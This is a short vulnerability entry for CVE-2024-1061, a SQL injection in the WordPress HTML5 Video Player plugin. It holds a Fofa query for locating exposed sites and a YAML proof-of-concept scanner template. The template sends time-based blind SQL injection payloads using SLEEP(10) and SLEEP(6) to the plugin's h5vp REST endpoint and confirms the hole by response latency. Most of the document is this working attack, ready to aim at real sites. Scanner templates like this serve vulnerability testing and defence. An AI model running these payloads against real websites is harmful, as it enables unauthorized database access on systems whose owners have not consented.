漏洞描述
Fofa: "wordpress" && body="html5-video-player"
CVE-2024-1061: WordPress HTML5 Video Player SQL注入
PoC代码[已公开]
id: CVE-2024-1061
info:
name: WordPress HTML5 Video Player SQL注入
author: zan8in
severity: high
verified: true
description: |-
Fofa: "wordpress" && body="html5-video-player"
reference:
- https://mp.weixin.qq.com/s/CqxyVUaSEwgjrCA8aLKQpg
tags: cve,cve2024,wordpress,sqli
created: 2024/02/21
rules:
r0:
request:
method: GET
path: /?rest_route=/h5vp/v1/view/1&id=1%27+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)--+
expression: |
response.status == 200 &&
response.body.bcontains(b'created_at') &&
response.body.bcontains(b'video_id') &&
response.latency <= 12000 &&
response.latency >= 10000
r1:
request:
method: GET
path: /?rest_route=/h5vp/v1/view/1&id=1%27+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+
expression: |
response.status == 200 &&
response.body.bcontains(b'created_at') &&
response.body.bcontains(b'video_id') &&
response.latency <= 8000 &&
response.latency >= 6000
r2:
request:
method: GET
path: /?rest_route=/h5vp/v1/view/1&id=1%27+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)--+
expression: |
response.status == 200 &&
response.body.bcontains(b'created_at') &&
response.body.bcontains(b'video_id') &&
response.latency <= 12000 &&
response.latency >= 10000
r3:
request:
method: GET
path: /?rest_route=/h5vp/v1/view/1&id=1%27+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+
expression: |
response.status == 200 &&
response.body.bcontains(b'created_at') &&
response.body.bcontains(b'video_id') &&
response.latency <= 8000 &&
response.latency >= 6000
extractors:
- type: word
extractor:
latency1: "6s"
latency2: "10s"
expression: r0() && r1() && r2() && r3()